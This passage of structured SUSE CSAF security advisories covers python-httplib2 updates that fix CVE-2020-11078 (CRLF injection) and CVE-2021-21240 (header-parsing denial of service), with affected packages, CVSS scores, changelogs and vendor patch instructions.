"https://www.suse.com/security/cve/CVE-2020-11078/", }, { category: "self", summary: "SUSE CVE CVE-2021-21240 page", url: "https://www.suse.com/security/cve/CVE-2021-21240/", }, ], 
title: "Security update for python-httplib2", tracking: { current_release_date: "2021-05-23T04:05:51Z", generator: { date: "2021-05-23T04:05:51Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "openSUSE-SU-2021:0772-1", initial_release_date: "2021-05-23T04:05:51Z", revision_history: [ { date: "2021-05-23T04:05:51Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python2-httplib2-0.19.0-lp152.6.3.1.noarch", product: { name: "python2-httplib2-0.19.0-lp152.6.3.1.noarch", product_id: "python2-httplib2-0.19.0-lp152.6.3.1.noarch", }, }, { category: "product_version", name: "python3-httplib2-0.19.0-lp152.6.3.1.noarch", product: { name: "python3-httplib2-0.19.0-lp152.6.3.1.noarch", product_id: "python3-httplib2-0.19.0-lp152.6.3.1.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "openSUSE Leap 15.2", product: { name: "openSUSE Leap 15.2", product_id: "openSUSE Leap 15.2", product_identification_helper: { cpe: "cpe:/o:opensuse:leap:15.2", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python2-httplib2-0.19.0-lp152.6.3.1.noarch as component of openSUSE Leap 15.2", product_id: "openSUSE Leap 15.2:python2-httplib2-0.19.0-lp152.6.3.1.noarch", }, product_reference: "python2-httplib2-0.19.0-lp152.6.3.1.noarch", relates_to_product_reference: "openSUSE Leap 15.2", }, { category: "default_component_of", full_product_name: { name: "python3-httplib2-0.19.0-lp152.6.3.1.noarch as component of openSUSE Leap 15.2", product_id: "openSUSE Leap 15.2:python3-httplib2-0.19.0-lp152.6.3.1.noarch", }, product_reference: "python3-httplib2-0.19.0-lp152.6.3.1.noarch", relates_to_product_reference: "openSUSE Leap 15.2", }, ], }, 
vulnerabilities: [ { cve: "CVE-2020-11078", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2020-11078", }, ], notes: [ { category: "general", text: "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Leap 15.2:python2-httplib2-0.19.0-lp152.6.3.1.noarch", "openSUSE Leap 15.2:python3-httplib2-0.19.0-lp152.6.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2020-11078", url: "https://www.suse.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "SUSE Bug 1171998 for CVE-2020-11078", url: "https://bugzilla.suse.com/1171998", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Leap 15.2:python2-httplib2-0.19.0-lp152.6.3.1.noarch", "openSUSE Leap 15.2:python3-httplib2-0.19.0-lp152.6.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.8, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "openSUSE Leap 15.2:python2-httplib2-0.19.0-lp152.6.3.1.noarch", "openSUSE Leap 15.2:python3-httplib2-0.19.0-lp152.6.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-23T04:05:51Z", details: "moderate", }, ], title: "CVE-2020-11078", }, { cve: "CVE-2021-21240", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2021-21240", }, ], notes: [ { category: "general", text: "httplib2 is a comprehensive HTTP client library for Python. 
In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Leap 15.2:python2-httplib2-0.19.0-lp152.6.3.1.noarch", "openSUSE Leap 15.2:python3-httplib2-0.19.0-lp152.6.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2021-21240", url: "https://www.suse.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "SUSE Bug 1182053 for CVE-2021-21240", url: "https://bugzilla.suse.com/1182053", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Leap 15.2:python2-httplib2-0.19.0-lp152.6.3.1.noarch", "openSUSE Leap 15.2:python3-httplib2-0.19.0-lp152.6.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "openSUSE Leap 15.2:python2-httplib2-0.19.0-lp152.6.3.1.noarch", "openSUSE Leap 15.2:python3-httplib2-0.19.0-lp152.6.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-23T04:05:51Z", details: "moderate", }, ], title: "CVE-2021-21240", }, ], }
opensuse-su-2021:0796-1
Vulnerability from csaf_opensuse
Notes
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for python-httplib2", title: "Title of the patch", }, { category: "description", text: "This update for python-httplib2 contains the following fixes:\n\nSecurity fixes included in this update:\n- CVE-2021-21240: Fixed a regular expression denial of service via malicious header (bsc#1182053).\n- CVE-2020-11078: Fixed an issue where an attacker could change request headers and body (bsc#1171998).\n\nNon security fixes included in this update:\n- Update in SLE to 0.19.0 (bsc#1182053, CVE-2021-21240)\n\n- update to 0.19.0:\n * auth: parse headers using pyparsing instead of regexp\n * auth: WSSE token needs to be string not bytes\n\n- update to 0.18.1: (bsc#1171998, CVE-2020-11078)\n * explicit build-backend workaround for pip build isolation bug\n * IMPORTANT security vulnerability CWE-93 CRLF injection\n Force %xx quote of space, CR, LF characters in uri.\n * Ship test suite in source dist\n\n- Update to 0.17.1\n * python3: no_proxy was not checked with https\n * feature: Http().redirect_codes set, works after follow(_all)_redirects check\n This allows one line workaround for old gcloud library that uses 308\n response without redirect semantics.\n * IMPORTANT cache invalidation change, fix 307 keep method, add 308 Redirects\n * proxy: username/password as str compatible with pysocks\n * python2: regression in connect() error handling\n * add support for password protected certificate files\n * feature: Http.close() to clean persistent connections and sensitive data\n\n- Update to 0.14.0:\n * Python3: PROXY_TYPE_SOCKS5 with str user/pass raised TypeError\n\n- version update to 0.13.1\n 0.13.1\n * 
Python3: Use no_proxy\n https://github.com/httplib2/httplib2/pull/140\n 0.13.0\n * Allow setting TLS max/min versions\n https://github.com/httplib2/httplib2/pull/138\n 0.12.3\n * No changes to library. Distribute py3 wheels.\n 0.12.1\n * Catch socket timeouts and clear dead connection\n https://github.com/httplib2/httplib2/issues/18\n https://github.com/httplib2/httplib2/pull/111\n * Officially support Python 3.7 (package metadata)\n https://github.com/httplib2/httplib2/issues/123\n 0.12.0\n * Drop support for Python 3.3\n * ca_certs from environment HTTPLIB2_CA_CERTS or certifi\n https://github.com/httplib2/httplib2/pull/117\n * PROXY_TYPE_HTTP with non-empty user/pass raised TypeError: bytes required\n https://github.com/httplib2/httplib2/pull/115\n * Revert http:443->https workaround\n https://github.com/httplib2/httplib2/issues/112\n * eliminate connection pool read race\n https://github.com/httplib2/httplib2/pull/110\n * cache: stronger safename\n https://github.com/httplib2/httplib2/pull/101\n 0.11.3\n * No changes, just reupload of 0.11.2 after fixing automatic release conditions in Travis.\n 0.11.2\n * proxy: py3 NameError basestring\n https://github.com/httplib2/httplib2/pull/100\n 0.11.1\n * Fix HTTP(S)ConnectionWithTimeout AttributeError proxy_info\n https://github.com/httplib2/httplib2/pull/97\n 0.11.0\n * Add DigiCert Global Root G2 serial 033af1e6a711a9a0bb2864b11d09fae5\n https://github.com/httplib2/httplib2/pull/91\n * python3 proxy support\n https://github.com/httplib2/httplib2/pull/90\n * If no_proxy environment value ends with comma then proxy is not used\n https://github.com/httplib2/httplib2/issues/11\n * fix UnicodeDecodeError using socks5 proxy\n https://github.com/httplib2/httplib2/pull/64\n * Respect NO_PROXY env var in proxy_info_from_url\n https://github.com/httplib2/httplib2/pull/58\n * NO_PROXY=bar was matching foobar (suffix without dot delimiter)\n New behavior matches curl/wget:\n - no_proxy=foo.bar will only skip proxy for exact 
hostname match\n - no_proxy=.wild.card will skip proxy for any.subdomains.wild.card\n https://github.com/httplib2/httplib2/issues/94\n * Bugfix for Content-Encoding: deflate\n https://stackoverflow.com/a/22311297\n- deleted patches\n - Removing certifi patch:\n httplib2 started to use certifi and this is already bent to\n use system certificate bundle by another patch\n\nThis update was imported from the SUSE:SLE-15:Update update project.\nThis update was imported from the openSUSE:Leap:15.2:Update update project.", title: "Description of the patch", }, { category: "details", text: "openSUSE-2021-796", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2021_0796-1.json", }, { category: "self", summary: "URL for openSUSE-SU-2021:0796-1", url: "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/BX6XMG6VSE6RQ4LZXDDXUYZZZ2FYOQM7/", }, { category: "self", summary: "E-Mail link for openSUSE-SU-2021:0796-1", url: "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/BX6XMG6VSE6RQ4LZXDDXUYZZZ2FYOQM7/", }, { category: "self", summary: "SUSE Bug 1171998", url: "https://bugzilla.suse.com/1171998", }, { category: "self", summary: "SUSE Bug 1182053", url: "https://bugzilla.suse.com/1182053", }, { category: "self", summary: "SUSE CVE CVE-2020-11078 page", url: "https://www.suse.com/security/cve/CVE-2020-11078/", }, { category: "self", summary: "SUSE CVE 
CVE-2021-21240 page", url: "https://www.suse.com/security/cve/CVE-2021-21240/", }, ], title: "Security update for python-httplib2", tracking: { current_release_date: "2021-05-26T12:05:23Z", generator: { date: "2021-05-26T12:05:23Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "openSUSE-SU-2021:0796-1", initial_release_date: "2021-05-26T12:05:23Z", revision_history: [ { date: "2021-05-26T12:05:23Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python2-httplib2-0.19.0-bp152.3.3.1.noarch", product: { name: "python2-httplib2-0.19.0-bp152.3.3.1.noarch", product_id: "python2-httplib2-0.19.0-bp152.3.3.1.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "SUSE Package Hub 15 SP2", product: { name: "SUSE Package Hub 15 SP2", product_id: "SUSE Package Hub 15 SP2", }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python2-httplib2-0.19.0-bp152.3.3.1.noarch as component of SUSE Package Hub 15 SP2", product_id: "SUSE Package Hub 15 SP2:python2-httplib2-0.19.0-bp152.3.3.1.noarch", }, product_reference: "python2-httplib2-0.19.0-bp152.3.3.1.noarch", relates_to_product_reference: "SUSE Package Hub 15 SP2", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2020-11078", }, ], notes: [ { category: "general", text: "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. 
This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Package Hub 15 SP2:python2-httplib2-0.19.0-bp152.3.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2020-11078", url: "https://www.suse.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "SUSE Bug 1171998 for CVE-2020-11078", url: "https://bugzilla.suse.com/1171998", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Package Hub 15 SP2:python2-httplib2-0.19.0-bp152.3.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.8, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "SUSE Package Hub 15 SP2:python2-httplib2-0.19.0-bp152.3.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-26T12:05:23Z", details: "moderate", }, ], title: "CVE-2020-11078", }, { cve: "CVE-2021-21240", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2021-21240", }, ], notes: [ { category: "general", text: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. 
This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Package Hub 15 SP2:python2-httplib2-0.19.0-bp152.3.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2021-21240", url: "https://www.suse.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "SUSE Bug 1182053 for CVE-2021-21240", url: "https://bugzilla.suse.com/1182053", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Package Hub 15 SP2:python2-httplib2-0.19.0-bp152.3.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "SUSE Package Hub 15 SP2:python2-httplib2-0.19.0-bp152.3.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-26T12:05:23Z", details: "moderate", }, ], title: "CVE-2021-21240", }, ], }
opensuse-su-2024:14141-1
Vulnerability from csaf_opensuse
Notes
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "python310-httplib2-0.22.0-4.5 on GA media", title: "Title of the patch", }, { category: "description", text: "These are all security issues fixed in the python310-httplib2-0.22.0-4.5 package on the GA media of openSUSE Tumbleweed.", title: "Description of the patch", }, { category: "details", text: "openSUSE-Tumbleweed-2024-14141", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_14141-1.json", }, { category: "self", summary: "SUSE CVE CVE-2020-11078 page", url: "https://www.suse.com/security/cve/CVE-2020-11078/", }, { category: "self", summary: "SUSE CVE CVE-2021-21240 page", url: "https://www.suse.com/security/cve/CVE-2021-21240/", }, ], title: "python310-httplib2-0.22.0-4.5 on GA media", tracking: { current_release_date: "2024-07-12T00:00:00Z", generator: { date: "2024-07-12T00:00:00Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "openSUSE-SU-2024:14141-1", initial_release_date: "2024-07-12T00:00:00Z", revision_history: [ { date: "2024-07-12T00:00:00Z", number: "1", summary: "Current version", }, ], status: 
"final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python310-httplib2-0.22.0-4.5.aarch64", product: { name: "python310-httplib2-0.22.0-4.5.aarch64", product_id: "python310-httplib2-0.22.0-4.5.aarch64", }, }, { category: "product_version", name: "python311-httplib2-0.22.0-4.5.aarch64", product: { name: "python311-httplib2-0.22.0-4.5.aarch64", product_id: "python311-httplib2-0.22.0-4.5.aarch64", }, }, { category: "product_version", name: "python312-httplib2-0.22.0-4.5.aarch64", product: { name: "python312-httplib2-0.22.0-4.5.aarch64", product_id: "python312-httplib2-0.22.0-4.5.aarch64", }, }, ], category: "architecture", name: "aarch64", }, { branches: [ { category: "product_version", name: "python310-httplib2-0.22.0-4.5.ppc64le", product: { name: "python310-httplib2-0.22.0-4.5.ppc64le", product_id: "python310-httplib2-0.22.0-4.5.ppc64le", }, }, { category: "product_version", name: "python311-httplib2-0.22.0-4.5.ppc64le", product: { name: "python311-httplib2-0.22.0-4.5.ppc64le", product_id: "python311-httplib2-0.22.0-4.5.ppc64le", }, }, { category: "product_version", name: "python312-httplib2-0.22.0-4.5.ppc64le", product: { name: "python312-httplib2-0.22.0-4.5.ppc64le", product_id: "python312-httplib2-0.22.0-4.5.ppc64le", }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "python310-httplib2-0.22.0-4.5.s390x", product: { name: "python310-httplib2-0.22.0-4.5.s390x", product_id: "python310-httplib2-0.22.0-4.5.s390x", }, }, { category: "product_version", name: "python311-httplib2-0.22.0-4.5.s390x", product: { name: "python311-httplib2-0.22.0-4.5.s390x", product_id: "python311-httplib2-0.22.0-4.5.s390x", }, }, { category: "product_version", name: "python312-httplib2-0.22.0-4.5.s390x", product: { name: "python312-httplib2-0.22.0-4.5.s390x", product_id: "python312-httplib2-0.22.0-4.5.s390x", }, }, ], category: "architecture", name: "s390x", }, { 
branches: [ { category: "product_version", name: "python310-httplib2-0.22.0-4.5.x86_64", product: { name: "python310-httplib2-0.22.0-4.5.x86_64", product_id: "python310-httplib2-0.22.0-4.5.x86_64", }, }, { category: "product_version", name: "python311-httplib2-0.22.0-4.5.x86_64", product: { name: "python311-httplib2-0.22.0-4.5.x86_64", product_id: "python311-httplib2-0.22.0-4.5.x86_64", }, }, { category: "product_version", name: "python312-httplib2-0.22.0-4.5.x86_64", product: { name: "python312-httplib2-0.22.0-4.5.x86_64", product_id: "python312-httplib2-0.22.0-4.5.x86_64", }, }, ], category: "architecture", name: "x86_64", }, { branches: [ { category: "product_name", name: "openSUSE Tumbleweed", product: { name: "openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed", product_identification_helper: { cpe: "cpe:/o:opensuse:tumbleweed", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python310-httplib2-0.22.0-4.5.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.aarch64", }, product_reference: "python310-httplib2-0.22.0-4.5.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python310-httplib2-0.22.0-4.5.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.ppc64le", }, product_reference: "python310-httplib2-0.22.0-4.5.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python310-httplib2-0.22.0-4.5.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.s390x", }, product_reference: "python310-httplib2-0.22.0-4.5.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: 
"default_component_of", full_product_name: { name: "python310-httplib2-0.22.0-4.5.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.x86_64", }, product_reference: "python310-httplib2-0.22.0-4.5.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python311-httplib2-0.22.0-4.5.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.aarch64", }, product_reference: "python311-httplib2-0.22.0-4.5.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python311-httplib2-0.22.0-4.5.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.ppc64le", }, product_reference: "python311-httplib2-0.22.0-4.5.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python311-httplib2-0.22.0-4.5.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.s390x", }, product_reference: "python311-httplib2-0.22.0-4.5.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python311-httplib2-0.22.0-4.5.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.x86_64", }, product_reference: "python311-httplib2-0.22.0-4.5.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python312-httplib2-0.22.0-4.5.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.aarch64", }, product_reference: "python312-httplib2-0.22.0-4.5.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: 
"default_component_of", full_product_name: { name: "python312-httplib2-0.22.0-4.5.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.ppc64le", }, product_reference: "python312-httplib2-0.22.0-4.5.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python312-httplib2-0.22.0-4.5.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.s390x", }, product_reference: "python312-httplib2-0.22.0-4.5.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python312-httplib2-0.22.0-4.5.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.x86_64", }, product_reference: "python312-httplib2-0.22.0-4.5.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2020-11078", }, ], notes: [ { category: "general", text: "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. 
This has been fixed in 0.18.0.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.x86_64", ], }, references: [ { category: "external", summary: "CVE-2020-11078", url: "https://www.suse.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "SUSE Bug 1171998 for CVE-2020-11078", url: "https://bugzilla.suse.com/1171998", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.x86_64", ], }, 
], scores: [ { cvss_v3: { baseScore: 6.8, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.x86_64", ], }, ], threats: [ { category: "impact", date: "2024-07-12T00:00:00Z", details: "moderate", }, ], title: "CVE-2020-11078", }, { cve: "CVE-2021-21240", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2021-21240", }, ], notes: [ { category: "general", text: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. 
This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.x86_64", ], }, references: [ { category: "external", summary: "CVE-2021-21240", url: "https://www.suse.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "SUSE Bug 1182053 for CVE-2021-21240", url: "https://bugzilla.suse.com/1182053", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.aarch64", "openSUSE 